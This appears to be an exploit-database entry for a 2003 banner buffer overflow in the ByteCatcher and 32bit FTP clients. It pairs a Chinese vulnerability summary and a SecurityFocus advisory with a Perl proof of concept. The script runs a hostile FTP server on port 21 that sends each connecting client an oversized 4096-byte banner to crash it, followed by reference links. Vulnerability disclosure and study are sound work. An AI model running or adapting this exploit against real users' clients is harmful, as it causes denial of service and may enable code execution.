https://www.exploit-db.com/exploits/22220
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-219

ByteCatcherFTPclient1.04b版本存在漏洞。远程攻击者可以导致服务拒绝（崩溃），并且可能通过一个超长FTP服务器标志执行任意代码。

source: http://www.securityfocus.com/bid/6762/info

It has been reported that ByteCatcher FTP client may be prone to a buffer overflow condition. This issue is due to the client not implementing bounds checking on banner data copied into local memory buffers.

It may be possible for remote attackers to corrupt sensitive regions of memory with attacker-supplied values, possibly resulting in execution of arbitrary code.

#!/usr/bin/perl
######################################################
#
# Affected systems:
# 32bit FTP Client version p9.49.01
# ByteCatcher FTP Client V1.04b
# Possible many other clients, got this problem to
#
# http://www.infowarfare.dk
#
# Dennis Rand - [email protected]
#
# When FTP client connects to this server they will CRASH
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
#
#
#
#######################################################
use IO::Socket;
$port = "21";
$data = "a";
$num = "4096";
$buf .= $data x $num;
$server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse
=> 1, Listen => 2)
or die "Couldn't create tcp-server.n";
while ($client = $server->accept()) {
print "Client connected.n";
print "Attacking...";
print $client "$buf";
print "OKn";
close($client);
}

来源:XF
名称:bytecatcher-ftp-banner-bo(11235)
链接:http://xforce.iss.net/xforce/xfdb/11235
来源:BID
名称:6762
链接:http://www.securityfocus.com/bid/6762
来源:VULNWATCH
名称:20030204BannerBufferOverflowsfoundinMultibleFTPClients
链接:http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0054.html